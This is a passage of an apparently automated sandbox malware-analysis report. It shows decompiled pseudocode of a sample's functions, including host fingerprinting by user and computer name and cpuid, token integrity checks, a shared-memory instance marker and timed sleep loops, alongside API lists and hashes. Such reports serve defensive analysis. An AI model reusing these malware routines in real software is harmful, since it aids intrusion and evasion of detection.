					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4f4d24c = 5;
						} else {
							_t68 = E04F473FD(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x4f4d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E04F48504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E04F43BF1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4f4d244);
							goto L21;
						} else {
							__eflags =  *0x4f4d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04F4A1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4f4d248);
								L21:
								L04F4B0C8();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x4f4d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                  0x04f46786
                                                  0x04f46798
                                                  0x04f4679b
                                                  0x04f467a7
                                                  0x04f467af
                                                  0x04f467b2
                                                  0x04f46919
                                                  0x04f467b8
                                                  0x04f467b8
                                                  0x04f467ba
                                                  0x04f467bf
                                                  0x04f467c0
                                                  0x04f467c6
                                                  0x04f467c9
                                                  0x04f467cc
                                                  0x04f467da
                                                  0x04f467e5
                                                  0x04f467e8
                                                  0x04f467ea
                                                  0x04f467f7
                                                  0x04f46801
                                                  0x04f46805
                                                  0x04f46808
                                                  0x04f4680d
                                                  0x04f46818
                                                  0x04f46818
                                                  0x04f4680f
                                                  0x04f4680f
                                                  0x04f46816
                                                  0x00000000
                                                  0x00000000
                                                  0x04f46816
                                                  0x04f46822
                                                  0x00000000
                                                  0x04f46825
                                                  0x04f46829
                                                  0x04f46834
                                                  0x04f46834
                                                  0x04f4683b
                                                  0x04f46844
                                                  0x04f4684b
                                                  0x04f46854
                                                  0x04f46857
                                                  0x04f4685a
                                                  0x04f46861
                                                  0x04f46864
                                                  0x00000000
                                                  0x00000000
                                                  0x04f46866
                                                  0x04f46869
                                                  0x04f4686c
                                                  0x04f4686f
                                                  0x00000000
                                                  0x04f46871
                                                  0x04f46880
                                                  0x04f46880
                                                  0x00000000
                                                  0x04f468ae
                                                  0x04f468ae
                                                  0x04f468b3
                                                  0x04f468d2
                                                  0x04f468d4
                                                  0x04f468d9
                                                  0x04f468da
                                                  0x00000000
                                                  0x04f468b5
                                                  0x04f468b5
                                                  0x04f468bb
                                                  0x00000000
                                                  0x04f468bd
                                                  0x04f468bd
                                                  0x04f468c2
                                                  0x04f468c4
                                                  0x04f468c9
                                                  0x04f468ca
                                                  0x04f468e0
                                                  0x04f468e0
                                                  0x04f468e8
                                                  0x04f468f3
                                                  0x04f468f6
                                                  0x04f46901
                                                  0x04f46903
                                                  0x04f46905
                                                  0x04f46908
                                                  0x00000000
                                                  0x04f4690e
                                                  0x00000000
                                                  0x04f4690e
                                                  0x04f46908
                                                  0x04f468bb
                                                  0x00000000
                                                  0x04f468b3
                                                  0x04f46883
                                                  0x04f46885
                                                  0x04f46888
                                                  0x04f46889
                                                  0x04f46889
                                                  0x04f4688d
                                                  0x04f46897
                                                  0x04f46897
                                                  0x04f4689d
                                                  0x04f468a0
                                                  0x04f468a0
                                                  0x04f468a6
                                                  0x04f468a6
                                                  0x04f46923
                                                  0x00000000

                                                  APIs
                                                  • memset.NTDLL ref: 04F4679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F467A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F467CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04F467E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F46801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F46897
                                                  • CloseHandle.KERNEL32(?), ref: 04F468A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04F468E0
                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04F42417,?), ref: 04F468F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F46901
                                                    • Part of subcall function 04F473FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,070793C0,?,00000000,30314549,00000014,004F0053,0707937C), ref: 04F474E9
                                                    • Part of subcall function 04F473FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F46814), ref: 04F474FB
                                                  • GetLastError.KERNEL32 ref: 04F46913
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: 872fbacf7494240db0f4407910a12ffc9ad027a91f9dcf56a8445176831f5a88
                                                  • Instruction ID: f2d2294cd66700ee381de8fa2760609ec98f83eea027f6d86302558a4cd7fc05
                                                  • Opcode Fuzzy Hash: 872fbacf7494240db0f4407910a12ffc9ad027a91f9dcf56a8445176831f5a88
                                                  • Instruction Fuzzy Hash: 51510D75D01229ABEF10DFD5EC449EEBFB8EF85364F104515E411E2190DB78AA45CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F41B2F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04F41B2F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04F4B0C2();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4f4d27c; // 0x212a5a8
				_t5 = _t13 + 0x4f4e862; // 0x7078e0a
				_t6 = _t13 + 0x4f4e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04F4AD5A();
				_t17 = CreateFileMappingW(0xffffffff, 0x4f4d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                  0x04f41b2f
                                                  0x04f41b37
                                                  0x04f41b3b
                                                  0x04f41b41
                                                  0x04f41b46
                                                  0x04f41b4b
                                                  0x04f41b4e
                                                  0x04f41b51
                                                  0x04f41b56
                                                  0x04f41b57
                                                  0x04f41b5a
                                                  0x04f41b5f
                                                  0x04f41b66
                                                  0x04f41b70
                                                  0x04f41b72
                                                  0x04f41b73
                                                  0x04f41b76
                                                  0x04f41b92
                                                  0x04f41b98
                                                  0x04f41b9c
                                                  0x04f41bea
                                                  0x04f41b9e
                                                  0x04f41bab
                                                  0x04f41bbb
                                                  0x04f41bc3
                                                  0x04f41bd5
                                                  0x04f41bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x04f41bc5
                                                  0x04f41bc8
                                                  0x04f41bcd
                                                  0x04f41bcf
                                                  0x04f41bcf
                                                  0x04f41bad
                                                  0x04f41baf
                                                  0x04f41bdb
                                                  0x04f41bdc
                                                  0x04f41bdc
                                                  0x04f41bab
                                                  0x04f41bf1

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04F422EA,?,?,4D283A53,?,?), ref: 04F41B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04F41B51
                                                  • _snwprintf.NTDLL ref: 04F41B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,04F4D2A8,00000004,00000000,00001000,?), ref: 04F41B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04F422EA,?,?,4D283A53), ref: 04F41BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04F41BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04F422EA,?,?), ref: 04F41BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04F422EA,?,?,4D283A53), ref: 04F41BE4
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: 4fa37f45b04cf65b4f870f49f8869efb0ffddca83711e07258a613a6657a518f
                                                  • Instruction ID: 0d7a518f037109807e84ff1cd740a9d6adf71bd4ba6482f9d91a169787b780f5
                                                  • Opcode Fuzzy Hash: 4fa37f45b04cf65b4f870f49f8869efb0ffddca83711e07258a613a6657a518f
                                                  • Instruction Fuzzy Hash: 43210576A01208BBD721DBA8DD09F8A3BB8EFC4710F154161F605E7290EF74E942CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F46A56, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60sleepmemorytimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04F46A56(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4f4d238 = _t10;
				if(_t10 != 0) {
					 *0x4f4d1a8 = GetTickCount();
					_t12 = E04F48F10(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L04F4B226();
							_t33 = _t14 + _t16;
							_t18 = E04F47E03(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E04F46B96(_t25) != 0) {
							 *0x4f4d260 = 1; // executed
						}
						_t12 = E04F4225B(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                  0x04f46a56
                                                  0x04f46a5c
                                                  0x04f46a5d
                                                  0x04f46a69
                                                  0x04f46a71
                                                  0x04f46a76
                                                  0x04f46a86
                                                  0x04f46a8b
                                                  0x04f46a92
                                                  0x04f46a94
                                                  0x04f46a99
                                                  0x04f46a9f
                                                  0x04f46aa5
                                                  0x04f46aaf
                                                  0x04f46ab3
                                                  0x04f46ab5
                                                  0x04f46aba
                                                  0x04f46abb
                                                  0x04f46abc
                                                  0x04f46ac1
                                                  0x04f46ac7
                                                  0x04f46ad0
                                                  0x04f46ad1
                                                  0x04f46ad6
                                                  0x04f46adc
                                                  0x04f46ae8
                                                  0x04f46aea
                                                  0x04f46aea
                                                  0x04f46af4
                                                  0x04f46af4
                                                  0x04f46a78
                                                  0x04f46a7a
                                                  0x04f46a7a
                                                  0x04f46afe

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04F4807D,?), ref: 04F46A69
                                                  • GetTickCount.KERNEL32 ref: 04F46A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04F4807D,?), ref: 04F46A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,04F4807D,?), ref: 04F46A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04F46ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04F4807D,?), ref: 04F46AD6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID: w6Q
                                                  • API String ID: 507476733-999249872
                                                  • Opcode ID: 016dd495ccd6dbd3e9efbaf9e411c833866ccf6a45eb9dd679e762bf9a3e62f0
                                                  • Instruction ID: 9f7e313fedf531cc1ea35640d0720de49e2d5315ed51b52387c160cc7c8c74df
                                                  • Opcode Fuzzy Hash: 016dd495ccd6dbd3e9efbaf9e411c833866ccf6a45eb9dd679e762bf9a3e62f0
                                                  • Instruction Fuzzy Hash: A811C276A00204AFF724AB78EC09B1A3F98DBD5750F004529F904C62C0EEB8FD518662
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4269C, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 96 4f4269c-4f426b0 97 4f426b2-4f426b7 96->97 98 4f426ba-4f426cc call 4f46b43 96->98 97->98 101 4f42720-4f4272d 98->101 102 4f426ce-4f426de GetUserNameW 98->102 104 4f4272f-4f42746 GetComputerNameW 101->104 103 4f426e0-4f426f0 RtlAllocateHeap 102->103 102->104 103->104 105 4f426f2-4f426ff GetUserNameW 103->105 106 4f42784-4f427a6 104->106 107 4f42748-4f42759 RtlAllocateHeap 104->107 108 4f42701-4f4270d call 4f42496 105->108 109 4f4270f-4f4271e HeapFree 105->109 107->106 110 4f4275b-4f42764 GetComputerNameW 107->110 108->109 109->104 112 4f42775-4f4277e HeapFree 110->112 113 4f42766-4f42772 call 4f42496 110->113 112->106 113->112
                                                  C-Code - Quality: 96%
                                                  			E04F4269C(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4f4d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04F46B43( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4f4d278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4f4d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E04F42496(_v8 + _v8, _t63);
							}
							HeapFree( *0x4f4d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4f4d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E04F42496(_v8 + _v8, _t63);
						}
						HeapFree( *0x4f4d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                  0x04f4269c
                                                  0x04f426a4
                                                  0x04f426aa
                                                  0x04f426ad
                                                  0x04f426b0
                                                  0x04f426b2
                                                  0x04f426b7
                                                  0x04f426b7
                                                  0x04f426bd
                                                  0x04f426bf
                                                  0x04f426cc
                                                  0x04f4272d
                                                  0x04f426ce
                                                  0x04f426d3
                                                  0x04f426d9
                                                  0x04f426de
                                                  0x04f426ec
                                                  0x04f426f0
                                                  0x04f426ff
                                                  0x04f42706
                                                  0x04f4270d
                                                  0x04f4270d
                                                  0x04f42718
                                                  0x04f42718
                                                  0x04f426f0
                                                  0x04f426de
                                                  0x04f4272f
                                                  0x04f42735
                                                  0x04f4273f
                                                  0x04f42741
                                                  0x04f42746
                                                  0x04f42755
                                                  0x04f42759
                                                  0x04f42764
                                                  0x04f4276b
                                                  0x04f42772
                                                  0x04f42772
                                                  0x04f4277e
                                                  0x04f4277e
                                                  0x04f42759
                                                  0x04f42787
                                                  0x04f42789
                                                  0x04f4278c
                                                  0x04f4278e
                                                  0x04f42791
                                                  0x04f42794
                                                  0x04f4279e
                                                  0x04f427a2
                                                  0x04f427a6

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 04F426D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F426EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 04F426F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04F423D9), ref: 04F42718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F4273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F42753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04F42760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04F423D9), ref: 04F4277E
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 7b9f0cea22b53e97efd77e3efec4bab9f68d0f1580d002ebbf75793c75005098
                                                  • Instruction ID: 977193a164fd2bcb8818402519a3d1cc6290379c7266c31b211df99bba364a77
                                                  • Opcode Fuzzy Hash: 7b9f0cea22b53e97efd77e3efec4bab9f68d0f1580d002ebbf75793c75005098
                                                  • Instruction Fuzzy Hash: 7331EA75A00209EFEB11DF69EC80A6EBBF9EF98350B124079E505D7250DF74EE469B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4924F, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E04F4924F(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4f4d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04F42049(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04F49039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                  0x04f4925c
                                                  0x04f49263
                                                  0x04f4926a
                                                  0x04f4927e
                                                  0x04f49289
                                                  0x04f492a1
                                                  0x04f492ae
                                                  0x04f492b1
                                                  0x04f492b6
                                                  0x04f492c1
                                                  0x04f492c5
                                                  0x04f492d4
                                                  0x04f492d8
                                                  0x04f492f4
                                                  0x04f492f4
                                                  0x04f492f8
                                                  0x04f492f8
                                                  0x04f492fd
                                                  0x04f49301
                                                  0x04f49307
                                                  0x04f49308
                                                  0x04f4930f
                                                  0x04f49315

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04F49281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04F492A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04F492B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 04F49301
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04F492D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04F492DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04F492EC
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: f28a9215a9a1f248030c4780d559eeef4d7e06867064dcf1b16b260ee4c1cccd
                                                  • Instruction ID: 021a7a1e94eca5a03a840f6d666b101dfc79b9ab95db5ec1b6901b0f3532aa33
                                                  • Opcode Fuzzy Hash: f28a9215a9a1f248030c4780d559eeef4d7e06867064dcf1b16b260ee4c1cccd
                                                  • Instruction Fuzzy Hash: 7C213EB590025DFFEB119FA4EC84DEEBFB9EB84304F000065E511A6154DB755E45EB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4225B, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 143 4f4225b-4f42276 call 4f4550e 146 4f4228c-4f4229a 143->146 147 4f42278-4f42286 143->147 149 4f422ac-4f422c7 call 4f43d0d 146->149 150 4f4229c-4f4229f 146->150 147->146 156 4f422d1 149->156 157 4f422c9-4f422cf 149->157 150->149 151 4f422a1-4f422a6 150->151 151->149 153 4f4242d 151->153 155 4f4242f-4f42435 153->155 158 4f422d7-4f422ec call 4f41bf4 call 4f41b2f 156->158 157->158 163 4f422f7-4f422fc 158->163 164 4f422ee-4f422f1 CloseHandle 158->164 165 4f42322-4f4233a call 4f42049 163->165 166 4f422fe-4f42303 163->166 164->163 175 4f42366-4f42368 165->175 176 4f4233c-4f42364 memset RtlInitializeCriticalSection 165->176 167 4f42419-4f4241d 166->167 168 4f42309 166->168 170 4f42425-4f4242b 167->170 171 4f4241f-4f42423 167->171 172 4f4230c-4f4231b call 4f4a501 168->172 170->155 171->155 171->170 181 4f4231d 172->181 177 4f42369-4f4236d 175->177 176->177 177->167 180 4f42373-4f42389 RtlAllocateHeap 177->180 182 4f423b9-4f423bb 180->182 183 4f4238b-4f423b7 wsprintfA 180->183 181->167 184 4f423bc-4f423c0 182->184 183->184 184->167 185 4f423c2-4f423e2 call 4f4269c call 4f44094 184->185 185->167 190 4f423e4-4f423eb call 4f496a4 185->190 193 4f423f2-4f423f9 190->193 194 4f423ed-4f423f0 190->194 195 4f4240e-4f42412 call 4f46786 193->195 196 4f423fb-4f423fd 193->196 194->167 200 4f42417 195->200 196->167 197 4f423ff-4f42403 call 4f43dd9 196->197 201 4f42408-4f4240c 197->201 200->167 201->167 201->195
                                                  C-Code - Quality: 57%
                                                  			E04F4225B(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04F4550E();
				if(_t21 != 0) {
					_t59 =  *0x4f4d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4f4d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4f4d164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04F43D0D( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4f4d27c; // 0x212a5a8
					if( *0x4f4d25c > 5) {
						_t8 = _t26 + 0x4f4e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4f4ea15; // 0x44283a44
						_t27 = _t7;
					}
					E04F41BF4(_t27, _t27);
					_t31 = E04F41B2F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x4f4d270 =  *0x4f4d270 ^ 0x81bbe65d;
						_t32 = E04F42049(0x60);
						__eflags = _t32;
						 *0x4f4d32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4f4d32c; // 0x70795b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
